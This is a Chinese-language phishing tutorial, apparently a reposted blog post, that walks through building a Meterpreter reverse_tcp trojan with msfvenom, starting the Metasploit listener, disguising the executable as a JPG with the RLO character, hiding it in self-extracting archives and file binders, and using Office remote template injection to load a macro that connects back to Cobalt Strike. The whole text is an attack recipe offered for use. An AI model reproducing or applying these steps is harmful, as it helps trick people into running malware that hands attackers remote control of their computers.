钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS

RLO伪装图片执行

利用msf生成木马x.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=4444 -f exe -o x.exe

Metasploit 打开反向监听的命令 

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

下面利用RLO对x.exe的后缀进行伪装,伪装成jpg,  把jpg反写成gpj,并点击鼠标右键

钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第1张图片

 钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第2张图片

 修改后效果如下图:

 钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第3张图片

双击测试,成功上线。

钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第4张图片

 2.伪装压缩包上线msf

同时选中木马.exe和正常文件.exe

右击鼠标选择添加到压缩文件

按照图片红色箭头进行勾选-创建自解压格式压缩文件......

钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第5张图片

 钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第6张图片

 钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第7张图片

 钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第8张图片

 钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第9张图片

最后对生成出来的压缩包利用上面的讲的RLO进行伪装

 钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第10张图片

 双击压缩包或解压文件尝试运行---运行成功

钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第11张图片

文件捆绑

打开文件捆绑器-选择宿主文件和捆绑的木马文件-选择图标(或自定义设置图标)  -保存并重命名

钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第12张图片

 点击捆绑软件,测试上线成功。

钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第13张图片

免杀对抗-office-远程模板加载上线CS

打开office创建一个模板并保存

钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第14张图片

重新创建一个word文件并插入CS生成出来的宏代码,保存时选择启用宏的Word模板,保存

 钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第15张图片

然后把这个包含宏病毒的1.dotm上传到远程服务器,确保可以访问到。

下面修改这个之前保存的模板文件

改后缀为zip等压缩文件格式,点击进去

钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第16张图片

 修改settings.xml.rels 修改里面的模板路径为之前上传服务器的1.docm(包含宏病毒)的文件路径。

钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第17张图片

把模板文件的后缀zip修改为原来的docx,点击打开文档,上线成功。钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS_第18张图片

你可能感兴趣的:(网络钓鱼,sql,数据库,database,web安全)